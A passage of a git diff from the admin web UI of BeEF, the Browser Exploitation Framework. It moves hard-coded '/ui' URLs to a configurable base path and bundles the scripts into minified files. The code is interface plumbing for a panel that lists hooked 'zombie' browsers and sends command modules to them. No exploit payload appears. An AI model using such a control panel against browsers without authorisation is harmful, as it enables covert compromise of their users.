+    def script_tag(filename) "<script src=\"#{$url}#{@bp}/media/javascript/#{filename}\" type=\"text/javascript\"></script>" end
+
+    # Constructs a html script tag (from media/javascript-min directory)
+    def script_tag_min(filename) "<script src=\"#{$url}#{@bp}/media/javascript-min/#{filename}\" type=\"text/javascript\"></script>" end
+
     # Constructs a html stylesheet tag
-    def stylesheet_tag(filename) "<link rel=\"stylesheet\" href=\"#{$url}/ui/media/css/#{filename}\" type=\"text/css\" />" end
+    def stylesheet_tag(filename) "<link rel=\"stylesheet\" href=\"#{$url}#{@bp}/media/css/#{filename}\" type=\"text/css\" />" end
 
     # Constructs a hidden html nonce tag
     def nonce_tag 
@@ -93,6 +97,10 @@ module AdminUI
       "<input type=\"hidden\" name=\"nonce\" id=\"nonce\" value=\"" + @session.get_nonce + "\"/>"
     end
 
+    def base_path
+      "#{@bp}"
+    end
+
     private
     
     @eruby
diff --git a/extensions/admin_ui/controllers/authentication/index.html b/extensions/admin_ui/controllers/authentication/index.html
index 95bba39af..17f9e980c 100644
--- a/extensions/admin_ui/controllers/authentication/index.html
+++ b/extensions/admin_ui/controllers/authentication/index.html
@@ -9,7 +9,7 @@
 	
 	<%= script_tag 'ext-base.js' %>
 	<%= script_tag 'ext-all.js' %>
-	<%= script_tag 'ui/authentication.js' %>
+    <%= script_tag_min 'web_ui_auth.js' %>
 	
 	<%= stylesheet_tag 'ext-all.css' %>
 	
@@ -31,6 +31,6 @@
 </head>
 
 <body>
-	<div id="centered"><img id="beef-logo" src="/ui/media/images/beef.png" alt="BeEF - The Browser Exploitation Framework" /></div>
+	<div id="centered"><img id="beef-logo" src="<%= base_path %>/media/images/beef.png" alt="BeEF - The Browser Exploitation Framework" /></div>
 </body>
 </html>
diff --git a/extensions/admin_ui/controllers/panel/index.html b/extensions/admin_ui/controllers/panel/index.html
index 0e111307b..b2f215a69 100644
--- a/extensions/admin_ui/controllers/panel/index.html
+++ b/extensions/admin_ui/controllers/panel/index.html
@@ -12,47 +12,8 @@
 
 	<%= script_tag 'ext-base.js' %>
 	<%= script_tag 'ext-all.js' %>
-	<%= script_tag 'ext-beef.js' %>
-
-	<!-- jQuery encoder (ESAPI way) -->
-	<%= script_tag 'esapi/jquery-1.6.4.min.js' %>
-	<%= script_tag 'esapi/Class.create.js' %>
-	<%= script_tag 'esapi/jquery-encoder-0.1.0.js' %>
-	<script type="text/javascript" language="JavaScript">var $jEncoder = jQuery.noConflict();</script>
-
-    <!-- BeEF Web UI common functions-->
-    <%= script_tag 'ui/common/beef_common.js' %>
-
-	<%= script_tag 'ux/TabCloseMenu.js' %>
-	<%= script_tag 'ux/StatusBar.js' %>
-	<%= script_tag 'ux/PagingStore.js' %>
-
-	<%= script_tag 'ui/panel/common.js' %>
-	<%= script_tag 'ui/panel/DistributedEngine.js' %>
-	<%= script_tag 'ui/panel/PanelStatusBar.js' %>
-
-	<%= script_tag 'ui/panel/tabs/ZombieTabDetails.js' %>
-	<%= script_tag 'ui/panel/tabs/ZombieTabLogs.js' %>
-	<%= script_tag 'ui/panel/tabs/ZombieTabCommands.js' %>
-	<%= script_tag 'ui/panel/tabs/ZombieTabRider.js' %>
-	<%= script_tag 'ui/panel/tabs/ZombieTabXssRays.js' %>
-
-    <%= script_tag 'wterm/wterm.jquery.js' %>
+    <%= script_tag_min 'web_ui_all.js' %>
     <%= stylesheet_tag 'wterm.css' %>
-    <script type="text/javascript" language="JavaScript">var $jwterm = jQuery.noConflict();</script>
-    <%= script_tag 'ui/panel/tabs/ZombieTabIpec.js' %>
-    <%= script_tag 'ui/panel/tabs/ZombieTabAutorun.js' %>
-    <%= script_tag 'ui/panel/PanelViewer.js' %>
-	<%= script_tag 'ui/panel/DataGrid.js' %>
-	<%= script_tag 'ui/panel/MainPanel.js' %>
-	<%= script_tag 'ui/panel/ZombieTab.js' %>
-	<%= script_tag 'ui/panel/ZombieTabs.js' %>
-	<%= script_tag 'ui/panel/zombiesTreeList.js' %>
-	<%= script_tag 'ui/panel/ZombiesMgr.js' %>
-	<%= script_tag 'ui/panel/Logout.js' %>
-	<%= script_tag 'ui/panel/WelcomeTab.js' %>
-	<!-- <%= script_tag 'ui/panel/HackVertorTab.js' %> -->
-
 	<%= stylesheet_tag 'ext-all.css' %>
 	<%= stylesheet_tag 'base.css' %>
 </head>
@@ -63,7 +24,7 @@
 		<div class="left-menu" id="header-right">
 		</div>
 		<div class="right-menu">
-			<img src="/ui/media/images/favicon.ico" alt="BeEF" title="BeEF" /> 
+			<img src="<%= base_path %>/media/images/favicon.ico" alt="BeEF" title="BeEF" />
 			BeEF <%= BeEF::Core::Configuration.instance.get('beef.version') %> | 
 			<a id='do-submit-bug-menu' href='https://github.com/beefproject/beef/issues/new' target='_blank'>Submit Bug</a> | 
 			<a id='do-logout-menu' href='#'>Logout</a>
diff --git a/extensions/admin_ui/media/javascript-min/readme b/extensions/admin_ui/media/javascript-min/readme
new file mode 100644
index 000000000..0fc3a7ba6
--- /dev/null
+++ b/extensions/admin_ui/media/javascript-min/readme
@@ -0,0 +1,2 @@
+This directory will contain minified JavaScript files used by the Web UI.
+Those files are excluded from the GIT report through the .gitignore file.
\ No newline at end of file
diff --git a/extensions/admin_ui/media/javascript/esapi/jquery-encoder-0.1.0.js b/extensions/admin_ui/media/javascript/esapi/jquery-encoder-0.1.0.js
index d05281662..7c091b55e 100644
--- a/extensions/admin_ui/media/javascript/esapi/jquery-encoder-0.1.0.js
+++ b/extensions/admin_ui/media/javascript/esapi/jquery-encoder-0.1.0.js
@@ -79,4 +79,7 @@ return Trie.Entry.newInstanceIfNeeded(key,pos,this._value);}});Trie.Entry.newIns
 if(value==null||key==null){return null;}
 if(key.length>keyLength){key=key.substr(0,keyLength);}
 return new Trie.Entry(key,value);};Trie.Node.newNodeMap=function(){return{};};var isValidCodePoint=function(codepoint){return codepoint>=0x0000&&codepoint<=0x10FFFF;};var isWhiteSpace=function(input){return input.match(/[\s]/);};var MAP_ENTITY_TO_CHAR=[];var MAP_CHAR_TO_ENTITY=[];var ENTITY_TO_CHAR_TRIE=new Trie();(function(){MAP_ENTITY_TO_CHAR["&quot"]="34";MAP_ENTITY_TO_CHAR["&amp"]="38";MAP_ENTITY_TO_CHAR["&lt"]="60";MAP_ENTITY_TO_CHAR["&gt"]="62";MAP_ENTITY_TO_CHAR["&nbsp"]="160";MAP_ENTITY_TO_CHAR["&iexcl"]="161";MAP_ENTITY_TO_CHAR["&cent"]="162";MAP_ENTITY_TO_CHAR["&pound"]="163";MAP_ENTITY_TO_CHAR["&curren"]="164";MAP_ENTITY_TO_CHAR["&yen"]="165";MAP_ENTITY_TO_CHAR["&brvbar"]="166";MAP_ENTITY_TO_CHAR["&sect"]="167";MAP_ENTITY_TO_CHAR["&uml"]="168";MAP_ENTITY_TO_CHAR["&copy"]="169";MAP_ENTITY_TO_CHAR["&ordf"]="170";MAP_ENTITY_TO_CHAR["&laquo"]="171";MAP_ENTITY_TO_CHAR["&not"]="172";MAP_ENTITY_TO_CHAR["&shy"]="173";MAP_ENTITY_TO_CHAR["&reg"]="174";MAP_ENTITY_TO_CHAR["&macr"]="175";MAP_ENTITY_TO_CHAR["&deg"]="176";MAP_ENTITY_TO_CHAR["&plusmn"]="177";MAP_ENTITY_TO_CHAR["&sup2"]="178";MAP_ENTITY_TO_CHAR["&sup3"]="179";MAP_ENTITY_TO_CHAR["&acute"]="180";MAP_ENTITY_TO_CHAR["&micro"]="181";MAP_ENTITY_TO_CHAR["&para"]="182";MAP_ENTITY_TO_CHAR["&middot"]="183";MAP_ENTITY_TO_CHAR["&cedil"]="184";MAP_ENTITY_TO_CHAR["&sup1"]="185";MAP_ENTITY_TO_CHAR["&ordm"]="186";MAP_ENTITY_TO_CHAR["&raquo"]="187";MAP_ENTITY_TO_CHAR["&frac14"]="188";MAP_ENTITY_TO_CHAR["&frac12"]="189";MAP_ENTITY_TO_CHAR["&frac34"]="190";MAP_ENTITY_TO_CHAR["&iquest"]="191";MAP_ENTITY_TO_CHAR["&Agrave"]="192";MAP_ENTITY_TO_CHAR["&Aacute"]="193";MAP_ENTITY_TO_CHAR["&Acirc"]="194";MAP_ENTITY_TO_CHAR["&Atilde"]="195";MAP_ENTITY_TO_CHAR["&Auml"]="196";MAP_ENTITY_TO_CHAR["&Aring"]="197";MAP_ENTITY_TO_CHAR["&AElig"]="198";MAP_ENTITY_TO_CHAR["&Ccedil"]="199";MAP_ENTITY_TO_CHAR["&Egrave"]="200";MAP_ENTITY_TO_CHAR["&Eacute"]="201";MAP_ENTITY_TO_CHAR["&Ecirc"]="202";MAP_ENTITY_TO_CHAR["&Euml"]="203";MAP_ENTITY_TO_CHAR["&Igrave"]="204";MAP_ENTITY_TO_CHAR["&Iacute"]="205";MAP_ENTITY_TO_CHAR["&Icirc"]="206";MAP_ENTITY_TO_CHAR["&Iuml"]="207";MAP_ENTITY_TO_CHAR["&ETH"]="208";MAP_ENTITY_TO_CHAR["&Ntilde"]="209";MAP_ENTITY_TO_CHAR["&Ograve"]="210";MAP_ENTITY_TO_CHAR["&Oacute"]="211";MAP_ENTITY_TO_CHAR["&Ocirc"]="212";MAP_ENTITY_TO_CHAR["&Otilde"]="213";MAP_ENTITY_TO_CHAR["&Ouml"]="214";MAP_ENTITY_TO_CHAR["&times"]="215";MAP_ENTITY_TO_CHAR["&Oslash"]="216";MAP_ENTITY_TO_CHAR["&Ugrave"]="217";MAP_ENTITY_TO_CHAR["&Uacute"]="218";MAP_ENTITY_TO_CHAR["&Ucirc"]="219";MAP_ENTITY_TO_CHAR["&Uuml"]="220";MAP_ENTITY_TO_CHAR["&Yacute"]="221";MAP_ENTITY_TO_CHAR["&THORN"]="222";MAP_ENTITY_TO_CHAR["&szlig"]="223";MAP_ENTITY_TO_CHAR["&agrave"]="224";MAP_ENTITY_TO_CHAR["&aacute"]="225";MAP_ENTITY_TO_CHAR["&acirc"]="226";MAP_ENTITY_TO_CHAR["&atilde"]="227";MAP_ENTITY_TO_CHAR["&auml"]="228";MAP_ENTITY_TO_CHAR["&aring"]="229";MAP_ENTITY_TO_CHAR["&aelig"]="230";MAP_ENTITY_TO_CHAR["&ccedil"]="231";MAP_ENTITY_TO_CHAR["&egrave"]="232";MAP_ENTITY_TO_CHAR["&eacute"]="233";MAP_ENTITY_TO_CHAR["&ecirc"]="234";MAP_ENTITY_TO_CHAR["&euml"]="235";MAP_ENTITY_TO_CHAR["&igrave"]="236";MAP_ENTITY_TO_CHAR["&iacute"]="237";MAP_ENTITY_TO_CHAR["&icirc"]="238";MAP_ENTITY_TO_CHAR["&iuml"]="239";MAP_ENTITY_TO_CHAR["&eth"]="240";MAP_ENTITY_TO_CHAR["&ntilde"]="241";MAP_ENTITY_TO_CHAR["&ograve"]="242";MAP_ENTITY_TO_CHAR["&oacute"]="243";MAP_ENTITY_TO_CHAR["&ocirc"]="244";MAP_ENTITY_TO_CHAR["&otilde"]="245";MAP_ENTITY_TO_CHAR["&ouml"]="246";MAP_ENTITY_TO_CHAR["&divide"]="247";MAP_ENTITY_TO_CHAR["&oslash"]="248";MAP_ENTITY_TO_CHAR["&ugrave"]="249";MAP_ENTITY_TO_CHAR["&uacute"]="250";MAP_ENTITY_TO_CHAR["&ucirc"]="251";MAP_ENTITY_TO_CHAR["&uuml"]="252";MAP_ENTITY_TO_CHAR["&yacute"]="253";MAP_ENTITY_TO_CHAR["&thorn"]="254";MAP_ENTITY_TO_CHAR["&yuml"]="255";MAP_ENTITY_TO_CHAR["&OElig"]="338";MAP_ENTITY_TO_CHAR["&oelig"]="339";MAP_ENTITY_TO_CHAR["&Scaron"]="352";MAP_ENTITY_TO_CHAR["&scaron"]="353";MAP_ENTITY_TO_CHAR["&Yuml"]="376";MAP_ENTITY_TO_CHAR["&fnof"]="402";MAP_ENTITY_TO_CHAR["&circ"]="710";MAP_ENTITY_TO_CHAR["&tilde"]="732";MAP_ENTITY_TO_CHAR["&Alpha"]="913";MAP_ENTITY_TO_CHAR["&Beta"]="914";MAP_ENTITY_TO_CHAR["&Gamma"]="915";MAP_ENTITY_TO_CHAR["&Delta"]="916";MAP_ENTITY_TO_CHAR["&Epsilon"]="917";MAP_ENTITY_TO_CHAR["&Zeta"]="918";MAP_ENTITY_TO_CHAR["&Eta"]="919";MAP_ENTITY_TO_CHAR["&Theta"]="920";MAP_ENTITY_TO_CHAR["&Iota"]="921";MAP_ENTITY_TO_CHAR["&Kappa"]="922";MAP_ENTITY_TO_CHAR["&Lambda"]="923";MAP_ENTITY_TO_CHAR["&Mu"]="924";MAP_ENTITY_TO_CHAR["&Nu"]="925";MAP_ENTITY_TO_CHAR["&Xi"]="926";MAP_ENTITY_TO_CHAR["&Omicron"]="927";MAP_ENTITY_TO_CHAR["&Pi"]="928";MAP_ENTITY_TO_CHAR["&Rho"]="929";MAP_ENTITY_TO_CHAR["&Sigma"]="931";MAP_ENTITY_TO_CHAR["&Tau"]="932";MAP_ENTITY_TO_CHAR["&Upsilon"]="933";MAP_ENTITY_TO_CHAR["&Phi"]="934";MAP_ENTITY_TO_CHAR["&Chi"]="935";MAP_ENTITY_TO_CHAR["&Psi"]="936";MAP_ENTITY_TO_CHAR["&Omega"]="937";MAP_ENTITY_TO_CHAR["&alpha"]="945";MAP_ENTITY_TO_CHAR["&beta"]="946";MAP_ENTITY_TO_CHAR["&gamma"]="947";MAP_ENTITY_TO_CHAR["&delta"]="948";MAP_ENTITY_TO_CHAR["&epsilon"]="949";MAP_ENTITY_TO_CHAR["&zeta"]="950";MAP_ENTITY_TO_CHAR["&eta"]="951";MAP_ENTITY_TO_CHAR["&theta"]="952";MAP_ENTITY_TO_CHAR["&iota"]="953";MAP_ENTITY_TO_CHAR["&kappa"]="954";MAP_ENTITY_TO_CHAR["&lambda"]="955";MAP_ENTITY_TO_CHAR["&mu"]="956";MAP_ENTITY_TO_CHAR["&nu"]="957";MAP_ENTITY_TO_CHAR["&xi"]="958";MAP_ENTITY_TO_CHAR["&omicron"]="959";MAP_ENTITY_TO_CHAR["&pi"]="960";MAP_ENTITY_TO_CHAR["&rho"]="961";MAP_ENTITY_TO_CHAR["&sigmaf"]="962";MAP_ENTITY_TO_CHAR["&sigma"]="963";MAP_ENTITY_TO_CHAR["&tau"]="964";MAP_ENTITY_TO_CHAR["&upsilon"]="965";MAP_ENTITY_TO_CHAR["&phi"]="966";MAP_ENTITY_TO_CHAR["&chi"]="967";MAP_ENTITY_TO_CHAR["&psi"]="968";MAP_ENTITY_TO_CHAR["&omega"]="969";MAP_ENTITY_TO_CHAR["&thetasym"]="977";MAP_ENTITY_TO_CHAR["&upsih"]="978";MAP_ENTITY_TO_CHAR["&piv"]="982";MAP_ENTITY_TO_CHAR["&ensp"]="8194";MAP_ENTITY_TO_CHAR["&emsp"]="8195";MAP_ENTITY_TO_CHAR["&thinsp"]="8201";MAP_ENTITY_TO_CHAR["&zwnj"]="8204";MAP_ENTITY_TO_CHAR["&zwj"]="8205";MAP_ENTITY_TO_CHAR["&lrm"]="8206";MAP_ENTITY_TO_CHAR["&rlm"]="8207";MAP_ENTITY_TO_CHAR["&ndash"]="8211";MAP_ENTITY_TO_CHAR["&mdash"]="8212";MAP_ENTITY_TO_CHAR["&lsquo"]="8216";MAP_ENTITY_TO_CHAR["&rsquo"]="8217";MAP_ENTITY_TO_CHAR["&sbquo"]="8218";MAP_ENTITY_TO_CHAR["&ldquo"]="8220";MAP_ENTITY_TO_CHAR["&rdquo"]="8221";MAP_ENTITY_TO_CHAR["&bdquo"]="8222";MAP_ENTITY_TO_CHAR["&dagger"]="8224";MAP_ENTITY_TO_CHAR["&Dagger"]="8225";MAP_ENTITY_TO_CHAR["&bull"]="8226";MAP_ENTITY_TO_CHAR["&hellip"]="8230";MAP_ENTITY_TO_CHAR["&permil"]="8240";MAP_ENTITY_TO_CHAR["&prime"]="8242";MAP_ENTITY_TO_CHAR["&Prime"]="8243";MAP_ENTITY_TO_CHAR["&lsaquo"]="8249";MAP_ENTITY_TO_CHAR["&rsaquo"]="8250";MAP_ENTITY_TO_CHAR["&oline"]="8254";MAP_ENTITY_TO_CHAR["&frasl"]="8260";MAP_ENTITY_TO_CHAR["&euro"]="8364";MAP_ENTITY_TO_CHAR["&image"]="8365";MAP_ENTITY_TO_CHAR["&weierp"]="8472";MAP_ENTITY_TO_CHAR["&real"]="8476";MAP_ENTITY_TO_CHAR["&trade"]="8482";MAP_ENTITY_TO_CHAR["&alefsym"]="8501";MAP_ENTITY_TO_CHAR["&larr"]="8592";MAP_ENTITY_TO_CHAR["&uarr"]="8593";MAP_ENTITY_TO_CHAR["&rarr"]="8594";MAP_ENTITY_TO_CHAR["&darr"]="8595";MAP_ENTITY_TO_CHAR["&harr"]="8596";MAP_ENTITY_TO_CHAR["&crarr"]="8629";MAP_ENTITY_TO_CHAR["&lArr"]="8656";MAP_ENTITY_TO_CHAR["&uArr"]="8657";MAP_ENTITY_TO_CHAR["&rArr"]="8658";MAP_ENTITY_TO_CHAR["&dArr"]="8659";MAP_ENTITY_TO_CHAR["&hArr"]="8660";MAP_ENTITY_TO_CHAR["&forall"]="8704";MAP_ENTITY_TO_CHAR["&part"]="8706";MAP_ENTITY_TO_CHAR["&exist"]="8707";MAP_ENTITY_TO_CHAR["&empty"]="8709";MAP_ENTITY_TO_CHAR["&nabla"]="8711";MAP_ENTITY_TO_CHAR["&isin"]="8712";MAP_ENTITY_TO_CHAR["&notin"]="8713";MAP_ENTITY_TO_CHAR["&ni"]="8715";MAP_ENTITY_TO_CHAR["&prod"]="8719";MAP_ENTITY_TO_CHAR["&sum"]="8721";MAP_ENTITY_TO_CHAR["&minus"]="8722";MAP_ENTITY_TO_CHAR["&lowast"]="8727";MAP_ENTITY_TO_CHAR["&radic"]="8730";MAP_ENTITY_TO_CHAR["&prop"]="8733";MAP_ENTITY_TO_CHAR["&infin"]="8734";MAP_ENTITY_TO_CHAR["&ang"]="8736";MAP_ENTITY_TO_CHAR["&and"]="8743";MAP_ENTITY_TO_CHAR["&or"]="8744";MAP_ENTITY_TO_CHAR["&cap"]="8745";MAP_ENTITY_TO_CHAR["&cup"]="8746";MAP_ENTITY_TO_CHAR["&int"]="8747";MAP_ENTITY_TO_CHAR["&there4"]="8756";MAP_ENTITY_TO_CHAR["&sim"]="8764";MAP_ENTITY_TO_CHAR["&cong"]="8773";MAP_ENTITY_TO_CHAR["&asymp"]="8776";MAP_ENTITY_TO_CHAR["&ne"]="8800";MAP_ENTITY_TO_CHAR["&equiv"]="8801";MAP_ENTITY_TO_CHAR["&le"]="8804";MAP_ENTITY_TO_CHAR["&ge"]="8805";MAP_ENTITY_TO_CHAR["&sub"]="8834";MAP_ENTITY_TO_CHAR["&sup"]="8835";MAP_ENTITY_TO_CHAR["&nsub"]="8836";MAP_ENTITY_TO_CHAR["&sube"]="8838";MAP_ENTITY_TO_CHAR["&supe"]="8839";MAP_ENTITY_TO_CHAR["&oplus"]="8853";MAP_ENTITY_TO_CHAR["&otimes"]="8855";MAP_ENTITY_TO_CHAR["&perp"]="8869";MAP_ENTITY_TO_CHAR["&sdot"]="8901";MAP_ENTITY_TO_CHAR["&lceil"]="8968";MAP_ENTITY_TO_CHAR["&rceil"]="8969";MAP_ENTITY_TO_CHAR["&lfloor"]="8970";MAP_ENTITY_TO_CHAR["&rfloor"]="8971";MAP_ENTITY_TO_CHAR["&lang"]="9001";MAP_ENTITY_TO_CHAR["&rang"]="9002";MAP_ENTITY_TO_CHAR["&loz"]="9674";MAP_ENTITY_TO_CHAR["&spades"]="9824";MAP_ENTITY_TO_CHAR["&clubs"]="9827";MAP_ENTITY_TO_CHAR["&hearts"]="9829";MAP_ENTITY_TO_CHAR["&diams"]="9830";for(var entity in MAP_ENTITY_TO_CHAR){if(!(typeof MAP_ENTITY_TO_CHAR[entity]=='function')&&MAP_ENTITY_TO_CHAR.hasOwnProperty(entity)){MAP_CHAR_TO_ENTITY[MAP_ENTITY_TO_CHAR[entity]]=entity;}}
-for(var c in MAP_CHAR_TO_ENTITY){if(!(typeof MAP_CHAR_TO_ENTITY[c]=='function')&&MAP_CHAR_TO_ENTITY.hasOwnProperty(c)){var ent=MAP_CHAR_TO_ENTITY[c].toLowerCase().substr(1);ENTITY_TO_CHAR_TRIE.put(ent,String.fromCharCode(c));}}})();if(Object.freeze){$.encoder=Object.freeze($.encoder);$.fn.encode=Object.freeze($.fn.encode);}else if(Object.seal){$.encoder=Object.seal($.encoder);$.fn.encode=Object.seal($.fn.encode);}else if(Object.preventExtensions){$.encoder=Object.preventExtensions($.encoder);$.fn.encode=Object.preventExtensions($.fn.encode);}})(jQuery);
\ No newline at end of file
+for(var c in MAP_CHAR_TO_ENTITY){if(!(typeof MAP_CHAR_TO_ENTITY[c]=='function')&&MAP_CHAR_TO_ENTITY.hasOwnProperty(c)){var ent=MAP_CHAR_TO_ENTITY[c].toLowerCase().substr(1);ENTITY_TO_CHAR_TRIE.put(ent,String.fromCharCode(c));}}})();if(Object.freeze){$.encoder=Object.freeze($.encoder);$.fn.encode=Object.freeze($.fn.encode);}else if(Object.seal){$.encoder=Object.seal($.encoder);$.fn.encode=Object.seal($.fn.encode);}else if(Object.preventExtensions){$.encoder=Object.preventExtensions($.encoder);$.fn.encode=Object.preventExtensions($.fn.encode);}})(jQuery);
+
+
+var $jEncoder = jQuery.noConflict();
\ No newline at end of file
diff --git a/extensions/admin_ui/media/javascript/ext-beef.js b/extensions/admin_ui/media/javascript/ext-beef.js
deleted file mode 100644
index 568a27412..000000000
--- a/extensions/admin_ui/media/javascript/ext-beef.js
+++ /dev/null
@@ -1,36 +0,0 @@
-//
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
-// See the file 'doc/COPYING' for copying permission
-//
-
-Ext.beef = function(){
-    var msgCt;
-
-    function createBox(t, s){
-        return ['<div class="msg">',
-                '<div class="x-box-tl"><div class="x-box-tr"><div class="x-box-tc"></div></div></div>',
-                '<div class="x-box-ml"><div class="x-box-mr"><div class="x-box-mc"><h3>', t, '</h3>', s, '</div></div></div>',
-                '<div class="x-box-bl"><div class="x-box-br"><div class="x-box-bc"></div></div></div>',
-                '</div>'].join('');
-    }
-    return {
-        msg : function(title, format){
-            if(!msgCt){
-                msgCt = Ext.DomHelper.insertFirst(document.body, {id:'msg-div'}, true);
-            }
-            msgCt.alignTo(document, 't-t');
-            var s = String.format.apply(String, Array.prototype.slice.call(arguments, 1));
-            var m = Ext.DomHelper.append(msgCt, {html:createBox(title, s)}, true);
-            m.slideIn('t').pause(1).ghost("t", {remove:true});
-        },
-
-        init : function(){
-
-            var lb = Ext.get('lib-bar');
-            if(lb){
-                lb.show();
-            }
-        }
-    };
-}();
\ No newline at end of file
diff --git a/extensions/admin_ui/media/javascript/ui/authentication.js b/extensions/admin_ui/media/javascript/ui/authentication.js
index 596772e38..1170e92ca 100644
--- a/extensions/admin_ui/media/javascript/ui/authentication.js
+++ b/extensions/admin_ui/media/javascript/ui/authentication.js
@@ -12,7 +12,7 @@ Ext.onReady(function() {
 		login_form.getForm().submit({
 
 			success: function() {
-				window.location.href = '/ui/panel'
+				window.location.href = "<%= @base_path %>/panel"
 			}, 
 			failure: function() {
 				if(Ext.get('loginError') == null) {
diff --git a/extensions/admin_ui/media/javascript/ui/common/beef_common.js b/extensions/admin_ui/media/javascript/ui/common/beef_common.js
index 1687dc33f..c95e35a61 100644
--- a/extensions/admin_ui/media/javascript/ui/common/beef_common.js
+++ b/extensions/admin_ui/media/javascript/ui/common/beef_common.js
@@ -20,7 +20,7 @@ if(typeof beefwui === 'undefined' && typeof window.beefwui === 'undefined') {
          */
         get_rest_token: function() {
             if(this.rest_token.length == 0){
-                var url = "/ui/modules/getRestfulApiToken.json";
+                var url = "<%= @base_path %>/modules/getRestfulApiToken.json";
                 jQuery.ajax({
                     contentType: 'application/json',
                     dataType: 'json',
diff --git a/extensions/admin_ui/media/javascript/ui/panel/Logout.js b/extensions/admin_ui/media/javascript/ui/panel/Logout.js
index 9a2f66a4f..d55aa3aa1 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/Logout.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/Logout.js
@@ -10,12 +10,12 @@ DoLogout = function() {
 	
 	after_logout = function() {
 		// will redirect the UA to the login
-		window.location.href = '/ui/panel'		
+		window.location.href = '<%= @base_path %>/panel'
 	}
 	
 	button.on('click', function(){
 		Ext.Ajax.request({
-			url: '/ui/authentication/logout',
+			url: '<%= @base_path %>/authentication/logout',
 			method: 'POST',
 		    params: 'nonce=' + Ext.get("nonce").dom.value,
 			success: after_logout,
diff --git a/extensions/admin_ui/media/javascript/ui/panel/MainPanel.js b/extensions/admin_ui/media/javascript/ui/panel/MainPanel.js
index 0620f95fb..a07e5aa10 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/MainPanel.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/MainPanel.js
@@ -29,7 +29,7 @@ MainPanel = function(){
         }
     });
 
-    this.grid = new DataGrid('/ui/logs/all.json',30);
+    this.grid = new DataGrid('<%= @base_path %>/logs/all.json',30);
 	this.grid.border = false;
     this.welcome_tab = new WelcomeTab;
 	//this.hooks_tab = new HooksTab;
diff --git a/extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js b/extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js
index 19442d570..22039b15a 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js
@@ -47,7 +47,7 @@ var lastpoll = new Date().getTime();
 Ext.TaskMgr.start({
 	run: function() {
 		Ext.Ajax.request({
-			url: '/ui/panel/hooked-browser-tree-update.json',
+			url: '<%= @base_path %>/panel/hooked-browser-tree-update.json',
 			method: 'POST',
 			success: function(response) {
 				var updates;
@@ -56,7 +56,7 @@ Ext.TaskMgr.start({
 				} catch (e) {
 					//The framework has probably been reset and you're actually logged out
 					var hr = document.getElementById("header-right");
-					hr.innerHTML = "You appear to be logged out. <a href='/ui/panel/'>Login</a>";
+					hr.innerHTML = "You appear to be logged out. <a href='<%= @base_path %>/panel/'>Login</a>";
 				}
 				var distributed_engine_rules = (updates['ditributed-engine-rules']) ? updates['ditributed-engine-rules'] : null;
 				var hooked_browsers = (updates['hooked-browsers']) ? updates['hooked-browsers'] : null;
diff --git a/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js b/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
index 397d24966..cad9c027a 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
@@ -12,7 +12,7 @@ WelcomeTab = function() {
 
     welcome = " \
               <div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' > \
-              <p><img src='/ui/media/images/beef.jpg' alt='BeEF - The Browser Exploitation Framework' /></p><br /> \
+              <p><img src='<%= @base_path %>/media/images/beef.jpg' alt='BeEF - The Browser Exploitation Framework' /></p><br /> \
               <p>Official website: <a href='http://beefproject.com/'>http://beefproject.com/</a></p><br />\
               <p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Getting Started</span></p><br />\
               <p>Welcome to BeEF!</p><br /> \
diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
index edcb09c5e..02c2a4106 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
@@ -37,9 +37,9 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		var has_realplayer     = zombie_array[index]["has_realplayer"];
 		var date_stamp         = zombie_array[index]["date_stamp"];
 
-		text = "<img src='/ui/media/images/icons/"+escape(browser_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
-		text+= "<img src='/ui/media/images/icons/"+escape(os_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
-		text+= "<img src='/ui/media/images/icons/"+escape(hw_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
+		text = "<img src='<%= @base_path %>/media/images/icons/"+escape(browser_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
+		text+= "<img src='<%= @base_path %>/media/images/icons/"+escape(os_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
+		text+= "<img src='<%= @base_path %>/media/images/icons/"+escape(hw_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
 		text+= ip;
 
 		balloon_text = "IP: "                  + ip;
diff --git a/extensions/admin_ui/media/javascript/ui/panel/common.js b/extensions/admin_ui/media/javascript/ui/panel/common.js
index d47e97c40..d7a472033 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/common.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/common.js
@@ -111,7 +111,7 @@ function get_dynamic_payload_details(payload, zombie) {
 	modid = Ext.getCmp( 'form-zombie-'+zombie.session+'-field-mod_id').value
 	Ext.Ajax.request({
 		loadMask: true,
-		url: '/ui/modules/select/commandmodule.json',
+		url: '/<%= @base_path %>/modules/select/commandmodule.json',
 		method: 'POST',
 		params: 'command_module_id=' + modid  + '&' + 'payload_name=' + payload,
 		success: function(resp) {
@@ -146,7 +146,7 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
 	panel.removeAll();
 	
 	Ext.Ajax.request({
-		url: '/ui/modules/select/command.json',
+		url: '<%= @base_path %>/modules/select/command.json',
 		method: 'POST',
 		params: 'command_id=' + command_id,
 		loadMask: true,
@@ -159,7 +159,7 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
